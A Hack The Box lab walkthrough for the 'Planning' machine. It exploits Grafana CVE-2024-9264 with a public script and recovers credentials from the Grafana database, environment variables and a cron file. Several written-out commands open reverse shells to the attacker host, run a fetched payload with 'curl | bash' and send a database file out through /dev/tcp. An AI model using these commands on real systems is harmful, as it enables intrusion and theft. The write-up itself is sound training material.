Hack The Box / LINUX / 2025-05-17
Hack The Box — Planning (Linux)
Grafana CVE-2024-9264 exploitation for container foothold, credential recovery from Grafana and cron artifacts, and root compromise via exposed cron management interface.
Target
- IP:
10.129.198.59
Machine information
As is common in real-life pentests, you start the Planning box with credentials for the following account:
admin / 0D5oT70Fq13EvB5r
Recon
sudo nmap -sC -sV 10.129.198.59 -p- -T5 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_ 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add planning.htb to /etc/hosts.
Go to http://planning.htb/.
It is a PHP website.
gobuster vhost -u 'http://planning.htb/' -w '/home/kali/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt' -t 50 --append-domain
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
Go to http://grafana.planning.htb/.
There is a login form.
Use credentials: admin / 0D5oT70Fq13EvB5r.
We can log in.
Click the question mark at top-right. Version shown:
Grafana v11.0.0 (83b9528bce)
There is a vulnerability (CVE-2024-9264) with an exploit:
- https://github.com/nollium/CVE-2024-9264
git clone https://github.com/nollium/CVE-2024-9264.git
python3 CVE-2024-9264/CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /etc/passwd http://grafana.planning.htb
We obtain /etc/passwd.
We notice user grafana with home in /home/grafana.
We can get a reverse shell.
Create a file rev with content:
bash -i >& /dev/tcp/10.10.14.252/4444 0>&1
Start listeners:
python3 -m http.server 8000
nc -vlnp 4444
python3 CVE-2024-9264/CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'curl http://10.10.14.252:8000/rev | bash' http://grafana.planning.htb
We get a reverse shell as user root, but we are inside a Docker container.
Upgrade the reverse shell:
script -qc /bin/bash /dev/null
CRTL+z
stty raw -echo
fg
In /var/lib/grafana/ there is file grafana.db.
To transfer it to our machine:
On attacker machine:
nc -vlnp 5555 > grafana.db
On victim machine:
cat grafana.db > /dev/tcp/10.10.14.252/5555
sqlite3 grafana.db
select * from user;
1|0|admin|admin@localhost||58e91b780977c1c34eb2274b75cb8577b215f2634a441fbb555d396edb3285a6c6b3a1f1ebca06e74ab6aa1a6a8edeb729d5|3H8kUvMcCR|cprH3V8GFe||1|1|0||2025-02-28 19:19:54|2025-04-03 12:31:49|0|2025-05-11 15:00:56|0|0|
There is only admin, but we already know the password.
env
We notice:
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
ssh enzo@planning.htb
Enter password RioTecRANDEntANT!.
We get a shell as user enzo.
cat /opt/crontabs/crontab.db
We notice this command is used:
/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz
So a backup is created and password P4ssw0rdS0pRi0T3c is used.
su root
If we enter that discovered password, it does not work.
ss -ltpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 511 127.0.0.1:8000 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:46315 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 4096 *:22 *:*
Forward port 8000:
ssh enzo@planning.htb -NL 8000:localhost:8000
Go to http://localhost:8000.
Credentials are requested.
Log in with:
root / P4ssw0rdS0pRi0T3c
Start netcat listener:
nc -vlnp 4444
On the site, create a new cronjob.
Set command:
bash -c 'bash -i >& /dev/tcp/10.10.14.252/4444 0>&1'
Save.
Click run now.
We get a reverse shell as user root.